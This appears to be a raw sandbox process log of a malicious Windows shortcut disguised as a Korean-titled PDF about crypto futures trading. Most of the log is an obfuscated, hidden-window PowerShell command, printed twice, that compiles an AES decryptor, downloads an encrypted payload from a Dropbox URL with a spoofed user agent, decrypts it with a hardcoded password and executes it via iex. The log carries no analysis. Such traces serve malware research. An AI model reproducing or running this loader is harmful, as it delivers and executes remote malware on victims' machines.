cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ZVhXA" "C:\Users\test22\AppData\Local\Temp\코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk"
3036cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkxxxxxxxxxxxxxxxx = 0x009FD0E0;$len1 = 1053892;$len2 = 10458736;$len3 = 10458736;$alis=@('morySt','898','Derive');$ms=-join ('Me',$alis[0],'ream');$rf=-join('Rfc2',$alis[1],$alis[2],'Bytes');$str=@($ms,'rypto',$rf, 'esManag', 'rea');$rep=@('msx','rx','RFDB','mang','ff');$def='using System;using System.IO;using System.Security.Crxgraphy;public class Init{public static Byte[] Dec(Byte[] inBytes,string pwd){msx im=new msx(inBytes);Byte[] s=new Byte[32];int len=im.Read(s,0,s.Length);if(len!=s.Length){return null;}RFDB pbk=new RFDB(pwd,s);Byte[] key=pbk.GetBytes(32);Byte[] iv=pbk.GetBytes(16);Amanged ma=new Amanged();ICrxTransform Dec=ma.CffteDecrxr(key,iv);CrxStffm cs=new CrxStffm(im,Dec,0);msx om=new msx();cs.CopyTo(om);om.Dispose();return om.ToArray();}}';$i=0;$a=1;$p='hoop';$s=@(':','s:');$r=$p -replace 'o','t';foreach($item in $rep){$def=$def -replace $item,$str[$i];$i++;}Add-Type -TypeDefinition $def;$pwd='pa55w0rd';$uh='dl.dropboxusercontent.com/scl/fi/';$agent=('Mozilla/5.0','(Windows NT 10.0; Win64; x64)','AppleWebKit/537.36','(KHTML,like Gecko)','Chrome/104.0.0.0','Safari/537.36') -join ' ';$r=-join ($r,$s[$a],'//',$uh);$ui=$r+'unk6wfun4ys2hyoekf00w/ad_ps.bin?rlkey=tzje3yre9hcve3i3b62pur1ou&st=d0n1avij&dl=0';$req=@{uri=$ui;useragent=$agent};try{[Byte[]]$bytes=(wget @req).content;} catch {if($a -eq 1){$ui=$ui -replace $s[1],$s[0];$req=@{uri=$ui;useragent=$agent};[Byte[]]$bytes=(wget @req).content;}}[Byte[]]$decbytes=[Init]::Dec($bytes,$pwd);$sc=[System.Text.Encoding]::ASCII.GetString($decbytes);iex -command $sc;"
2184powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkxxxxxxxxxxxxxxxx = 0x009FD0E0;$len1 = 1053892;$len2 = 10458736;$len3 = 10458736;$alis=@('morySt','898','Derive');$ms=-join ('Me',$alis[0],'ream');$rf=-join('Rfc2',$alis[1],$alis[2],'Bytes');$str=@($ms,'rypto',$rf, 'esManag', 'rea');$rep=@('msx','rx','RFDB','mang','ff');$def='using System;using System.IO;using System.Security.Crxgraphy;public class Init{public static Byte[] Dec(Byte[] inBytes,string pwd){msx im=new msx(inBytes);Byte[] s=new Byte[32];int len=im.Read(s,0,s.Length);if(len!=s.Length){return null;}RFDB pbk=new RFDB(pwd,s);Byte[] key=pbk.GetBytes(32);Byte[] iv=pbk.GetBytes(16);Amanged ma=new Amanged();ICrxTransform Dec=ma.CffteDecrxr(key,iv);CrxStffm cs=new CrxStffm(im,Dec,0);msx om=new msx();cs.CopyTo(om);om.Dispose();return om.ToArray();}}';$i=0;$a=1;$p='hoop';$s=@(':','s:');$r=$p -replace 'o','t';foreach($item in $rep){$def=$def -replace $item,$str[$i];$i++;}Add-Type -TypeDefinition $def;$pwd='pa55w0rd';$uh='dl.dropboxusercontent.com/scl/fi/';$agent=('Mozilla/5.0','(Windows NT 10.0; Win64; x64)','AppleWebKit/537.36','(KHTML,like Gecko)','Chrome/104.0.0.0','Safari/537.36') -join ' ';$r=-join ($r,$s[$a],'//',$uh);$ui=$r+'unk6wfun4ys2hyoekf00w/ad_ps.bin?rlkey=tzje3yre9hcve3i3b62pur1ou&st=d0n1avij&dl=0';$req=@{uri=$ui;useragent=$agent};try{[Byte[]]$bytes=(wget @req).content;} catch {if($a -eq 1){$ui=$ui -replace $s[1],$s[0];$req=@{uri=$ui;useragent=$agent};[Byte[]]$bytes=(wget @req).content;}}[Byte[]]$decbytes=[Init]::Dec($bytes,$pwd);$sc=[System.Text.Encoding]::ASCII.GetString($decbytes);iex -command $sc;"
292csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\5hlmrpb4.cmdline"
2452